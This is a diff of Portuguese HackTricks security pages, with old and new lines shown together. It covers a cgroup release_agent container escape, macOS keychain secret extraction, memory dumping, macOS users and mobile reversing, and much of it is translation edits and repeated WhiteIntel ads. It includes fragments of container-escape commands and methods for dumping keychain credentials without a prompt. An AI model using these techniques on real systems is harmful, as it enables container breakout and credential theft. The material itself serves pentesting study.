- O caminho do contêiner no host é obtido a partir do arquivo /etc/mtab.
- O caminho do contêiner no host é obtido do arquivo /etc/mtab.
- O arquivo release_agent do cgroup é então configurado para executar um script chamado /cmd localizado no caminho do host adquirido.
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
@ -59,16 +72,28 @@ chmod a+x /cmd
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

68
macos-hardening/macos-red-teaming/macos-keychain.md
View file

@ -2,26 +2,40 @@
<details>
<summary><strong>Aprenda hacking da AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking da AWS do zero ao avançado com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
Outras formas de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no GitHub.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Principais Chaveiros
* O **Chaveiro do Usuário** (`~/Library/Keychains/login.keycahin-db`), que é usado para armazenar **credenciais específicas do usuário** como senhas de aplicativos, senhas de internet, certificados gerados pelo usuário, senhas de rede e chaves públicas/privadas geradas pelo usuário.
* O **Chaveiro do Sistema** (`/Library/Keychains/System.keychain`), que armazena **credenciais de todo o sistema** como senhas WiFi, certificados raiz do sistema, chaves privadas do sistema e senhas de aplicativos do sistema.
* O **Chaveiro do Sistema** (`/Library/Keychains/System.keychain`), que armazena **credenciais de todo o sistema** como senhas de WiFi, certificados raiz do sistema, chaves privadas do sistema e senhas de aplicativos do sistema.
### Acesso ao Chaveiro de Senhas
Esses arquivos, embora não tenham proteção inerente e possam ser **baixados**, são criptografados e exigem a **senha em texto simples do usuário para serem descriptografados**. Uma ferramenta como [**Chainbreaker**](https://github.com/n0fate/chainbreaker) pode ser usada para descriptografia.
Esses arquivos, embora não tenham proteção inerente e possam ser **baixados**, são criptografados e exigem a **senha em texto simples do usuário para serem descriptografados**. Uma ferramenta como [**Chainbreaker**](https://github.com/n0fate/chainbreaker) pode ser usada para descriptografar.
## Proteções de Entradas do Chaveiro
@ -37,11 +51,11 @@ As ACLs são acompanhadas por uma **lista de aplicativos confiáveis** que podem
* &#x20;**N`il`** (nenhuma autorização necessária, **todos são confiáveis**)
* Uma lista **vazia** (ninguém é confiável)
* Lista de **aplicativos** específicos.
* Lista de **aplicativos específicos**.
Também a entrada pode conter a chave **`ACLAuthorizationPartitionID`,** que é usada para identificar o **teamid, apple** e **cdhash.**
Além disso, a entrada pode conter a chave **`ACLAuthorizationPartitionID`,** que é usada para identificar o **teamid, apple** e **cdhash.**
* Se o **teamid** for especificado, então para **acessar o valor da entrada** sem um **prompt** o aplicativo usado deve ter o **mesmo teamid**.
* Se o **teamid** for especificado, então para **acessar o valor da entrada** sem um **prompt**, o aplicativo usado deve ter o **mesmo teamid**.
* Se o **apple** for especificado, então o aplicativo precisa ser **assinado** pela **Apple**.
* Se o **cdhash** for indicado, então o **aplicativo** deve ter o **cdhash** específico.
@ -58,10 +72,10 @@ Quando uma **nova** **entrada** é criada usando o **`Keychain Access.app`**, as
Quando um **aplicativo cria uma entrada no chaveiro**, as regras são ligeiramente diferentes:
* Todos os aplicativos podem criptografar.
* Apenas o **aplicativo criador** (ou qualquer outro aplicativo explicitamente adicionado) pode exportar/descriptografar (sem solicitar ao usuário).
* Apenas o **aplicativo criador** (ou quaisquer outros aplicativos adicionados explicitamente) podem exportar/descriptografar (sem solicitar ao usuário).
* Todos os aplicativos podem ver a verificação de integridade.
* Nenhum aplicativo pode alterar as ACLs.
* O **partitionID** é definido como **`teamid:[teamID aqui]**.
* O **partitionID** é definido como **`teamid:[teamID aqui]`**.
## Acessando o Chaveiro
@ -79,21 +93,21 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### APIs
{% hint style="success" %}
A **enumeração e dumping do keychain** de segredos que **não geram um prompt** podem ser feitos com a ferramenta [**LockSmith**](https://github.com/its-a-feature/LockSmith)
A **enumeração e extração de segredos do chaveiro** que **não gera um prompt** pode ser feita com a ferramenta [**LockSmith**](https://github.com/its-a-feature/LockSmith)
{% endhint %}
Liste e obtenha **informações** sobre cada entrada do keychain:
Liste e obtenha **informações** sobre cada entrada do chaveiro:
* A API **`SecItemCopyMatching`** fornece informações sobre cada entrada e existem alguns atributos que você pode definir ao usá-la:
* **`kSecReturnData`**: Se verdadeiro, tentará descriptografar os dados (defina como falso para evitar possíveis pop-ups)
* **`kSecReturnRef`**: Obtenha também a referência ao item do keychain (defina como verdadeiro no caso de posteriormente você conseguir descriptografar sem pop-up)
* **`kSecReturnRef`**: Obtenha também a referência ao item do chaveiro (defina como verdadeiro caso depois você veja que pode descriptografar sem pop-up)
* **`kSecReturnAttributes`**: Obtenha metadados sobre as entradas
* **`kSecMatchLimit`**: Quantos resultados retornar
* **`kSecClass`**: Que tipo de entrada do keychain
* **`kSecClass`**: Que tipo de entrada do chaveiro
Obtenha **ACLs** de cada entrada:
Obtenha as **ACLs** de cada entrada:
* Com a API **`SecAccessCopyACLList`** você pode obter o **ACL para o item do keychain**, e ele retornará uma lista de ACLs (como `ACLAuhtorizationExportClear` e os outros mencionados anteriormente) onde cada lista tem:
* Com a API **`SecAccessCopyACLList`** você pode obter a **ACL para o item do chaveiro**, e ela retornará uma lista de ACLs (como `ACLAuhtorizationExportClear` e as outras mencionadas anteriormente) onde cada lista tem:
* Descrição
* **Lista de Aplicativos Confiáveis**. Isso poderia ser:
* Um aplicativo: /Applications/Slack.app
@ -110,8 +124,8 @@ E estes são os **requisitos** para poder **exportar um segredo sem um prompt**:
* Se **1+ aplicativos confiáveis** listados:
* Precisa das **autorizações apropriadas** (**`Nil`**, ou fazer **parte** da lista permitida de aplicativos na autorização para acessar as informações secretas)
* Precisa que a assinatura de código corresponda ao **PartitionID**
* Precisa que a assinatura de código corresponda à de um **aplicativo confiável** (ou ser membro do grupo de acesso correto do Keychain)
* Se **todos os aplicativos são confiáveis**:
* Precisa que a assinatura de código corresponda à de um **aplicativo confiável** (ou ser membro do grupo KeychainAccessGroup correto)
* Se **todos os aplicativos forem confiáveis**:
* Precisa das **autorizações apropriadas**
* Precisa que a assinatura de código corresponda ao **PartitionID**
* Se **não houver PartitionID**, então isso não é necessário
@ -132,6 +146,18 @@ Se **apple** for indicado no **partitionID**, você poderá acessá-lo com **`os
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo de busca deles **gratuitamente** em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -139,8 +165,8 @@ Se **apple** for indicado no **partitionID**, você poderá acessá-lo com **`os
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

40
macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
View file

@ -1,4 +1,4 @@
# Dumping de Memória no macOS
# Dump de Memória do macOS
<details>
@ -14,6 +14,20 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Artefatos de Memória
### Arquivos de Troca
@ -22,19 +36,19 @@ Arquivos de troca, como `/private/var/vm/swapfile0`, servem como **caches quando
### Imagem de Hibernação
O arquivo localizado em `/private/var/vm/sleepimage` é crucial durante o **modo de hibernação**. **Os dados da memória são armazenados neste arquivo quando o macOS hiberna**. Ao acordar o computador, o sistema recupera os dados da memória deste arquivo, permitindo que o usuário continue de onde parou.
O arquivo localizado em `/private/var/vm/sleepimage` é crucial durante o **modo de hibernação**. **Dados da memória são armazenados neste arquivo quando o OS X hiberna**. Ao acordar o computador, o sistema recupera os dados da memória deste arquivo, permitindo que o usuário continue de onde parou.
Vale ressaltar que nos sistemas macOS modernos, este arquivo geralmente é criptografado por motivos de segurança, tornando a recuperação difícil.
Vale ressaltar que nos sistemas MacOS modernos, este arquivo é tipicamente criptografado por motivos de segurança, tornando a recuperação difícil.
* Para verificar se a criptografia está ativada para o sleepimage, o comando `sysctl vm.swapusage` pode ser executado. Isso mostrará se o arquivo está criptografado.
### Logs de Pressão de Memória
Outro arquivo importante relacionado à memória em sistemas macOS é o **log de pressão de memória**. Esses logs estão localizados em `/var/log` e contêm informações detalhadas sobre o uso de memória do sistema e eventos de pressão. Eles podem ser particularmente úteis para diagnosticar problemas relacionados à memória ou entender como o sistema gerencia a memória ao longo do tempo.
Outro arquivo importante relacionado à memória em sistemas MacOS são os **logs de pressão de memória**. Esses logs estão localizados em `/var/log` e contêm informações detalhadas sobre o uso de memória do sistema e eventos de pressão. Eles podem ser particularmente úteis para diagnosticar problemas relacionados à memória ou entender como o sistema gerencia a memória ao longo do tempo.
## Dumping de memória com osxpmem
## Dump de memória com osxpmem
Para fazer o dumping de memória em uma máquina macOS, você pode usar [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
Para fazer o dump de memória em uma máquina MacOS, você pode usar [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
**Nota**: As instruções a seguir funcionarão apenas para Macs com arquitetura Intel. Esta ferramenta está arquivada e o último lançamento foi em 2017. O binário baixado usando as instruções abaixo tem como alvo chips Intel, pois o Apple Silicon não existia em 2017. Pode ser possível compilar o binário para a arquitetura arm64, mas você terá que tentar por conta própria.
```bash
@ -62,6 +76,18 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
```
{% endcode %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares stealers**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -72,6 +98,6 @@ Outras maneiras de apoiar o HackTricks:
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

26
macos-hardening/macos-security-and-privilege-escalation/macos-users.md
View file

@ -4,9 +4,9 @@
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
Outras formas de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -14,9 +14,23 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
### Usuários Comuns
* **Daemon**: Usuário reservado para daemons do sistema. Os nomes padrão de conta de daemon geralmente começam com um "\_":
* **Daemon**: Usuário reservado para daemons do sistema. Os nomes de conta de daemon padrão geralmente começam com um "\_":
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
@ -30,7 +44,7 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
```
{% endcode %}
* **Ninguém**: Processos são executados com este usuário quando são necessárias permissões mínimas
* **Ninguém**: Os processos são executados com este usuário quando são necessárias permissões mínimas
* **Root**
### Privilégios de Usuário
@ -38,7 +52,7 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
* **Usuário Padrão:** O mais básico dos usuários. Este usuário precisa de permissões concedidas por um usuário administrador ao tentar instalar software ou realizar outras tarefas avançadas. Eles não são capazes de fazer isso por conta própria.
* **Usuário Admin**: Um usuário que opera na maioria das vezes como um usuário padrão, mas também é permitido realizar ações de root, como instalar software e outras tarefas administrativas. Todos os usuários pertencentes ao grupo admin têm **acesso ao root via arquivo sudoers**.
* **Root**: Root é um usuário permitido a realizar quase qualquer ação (existem limitações impostas por proteções como a Proteção da Integridade do Sistema).
* Por exemplo, o root não será capaz de colocar um arquivo dentro de `/System`
* Por exemplo, o root não poderá colocar um arquivo dentro de `/System`
<details>
@ -46,7 +60,7 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
Outras formas de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

45
mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View file

@ -4,9 +4,9 @@
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
Outras formas de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -14,16 +14,30 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
**Para mais informações, acesse: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
Os aplicativos Android podem usar bibliotecas nativas, geralmente escritas em C ou C++, para tarefas críticas de desempenho. Os criadores de malware também usam essas bibliotecas, pois são mais difíceis de serem revertidas do que o bytecode DEX. A seção enfatiza habilidades de engenharia reversa adaptadas ao Android, em vez de ensinar linguagens de montagem. As versões ARM e x86 das bibliotecas são fornecidas para compatibilidade.
Os aplicativos Android podem usar bibliotecas nativas, geralmente escritas em C ou C++, para tarefas críticas de desempenho. Os criadores de malwares também usam essas bibliotecas, pois são mais difíceis de serem revertidas do que o bytecode DEX. A seção enfatiza habilidades de engenharia reversa adaptadas ao Android, em vez de ensinar linguagens de montagem. As versões ARM e x86 das bibliotecas são fornecidas para compatibilidade.
### Pontos Chave:
- **Bibliotecas Nativas em Aplicativos Android:**
- Usadas para tarefas intensivas de desempenho.
- Escritas em C ou C++, tornando a engenharia reversa desafiadora.
- Encontradas no formato `.so` (objeto compartilhado), semelhante aos binários do Linux.
- Os criadores de malware preferem código nativo para dificultar a análise.
- Os criadores de malwares preferem código nativo para dificultar a análise.
- **Interface Nativa Java (JNI) e NDK Android:**
- JNI permite que métodos Java sejam implementados em código nativo.
@ -36,8 +50,8 @@ Os aplicativos Android podem usar bibliotecas nativas, geralmente escritas em C
- Métodos nativos declarados em Java se conectam a funções nativas, permitindo a execução.
- **Vinculando Métodos Java a Funções Nativas:**
- **Vinculação Dinâmica:** Nomes de função em bibliotecas nativas correspondem a um padrão específico, permitindo a vinculação automática.
- **Vinculação Estática:** Usa `RegisterNatives` para vinculação, fornecendo flexibilidade no nome e estrutura da função.
- **Vinculação Dinâmica:** Nomes de funções em bibliotecas nativas correspondem a um padrão específico, permitindo a vinculação automática.
- **Vinculação Estática:** Usa `RegisterNatives` para vinculação, fornecendo flexibilidade no nome e estrutura das funções.
- **Ferramentas e Técnicas de Engenharia Reversa:**
- Ferramentas como Ghidra e IDA Pro ajudam a analisar bibliotecas nativas.
@ -54,16 +68,29 @@ Os aplicativos Android podem usar bibliotecas nativas, geralmente escritas em C
- [Dicas JNI do Android](https://developer.android.com/training/articles/perf-jni)
- [Começando com o NDK](https://developer.android.com/ndk/guides/)
- **Depurando Bibliotecas Nativas:**
- **Depuração de Bibliotecas Nativas:**
- [Depurando Bibliotecas Nativas do Android Usando o Decompilador JEB](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
Outras formas de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

65
mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md
View file

@ -9,11 +9,25 @@ Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
